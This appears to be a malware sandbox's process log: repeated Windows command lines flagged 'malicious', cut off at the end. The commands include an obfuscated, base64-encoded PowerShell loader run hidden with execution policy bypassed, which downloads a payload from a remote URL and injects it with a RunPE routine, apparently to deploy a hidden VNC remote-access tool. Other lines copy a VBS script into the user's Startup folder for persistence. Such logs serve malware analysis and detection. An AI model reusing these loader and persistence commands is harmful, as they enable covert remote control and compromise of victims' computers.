"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\pow\wm_startup.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\pow\wm.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
 malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat" "
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\sys\hnvc.vbs"
malicious
C:\Windows\System32\cmd.exe
cmd.exe /e:ON /v:OFF /d /c ""C:\Users\Public\Documents\32\pure_hnvc.bat""
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Documents\32\hnvc.vbs"
malicious
C:\Windows\System32\cmd.exe
"cmd" /C echo %username%
 malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Users\Public\Documents\pow\wm.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.navircse.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\hvnc.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicr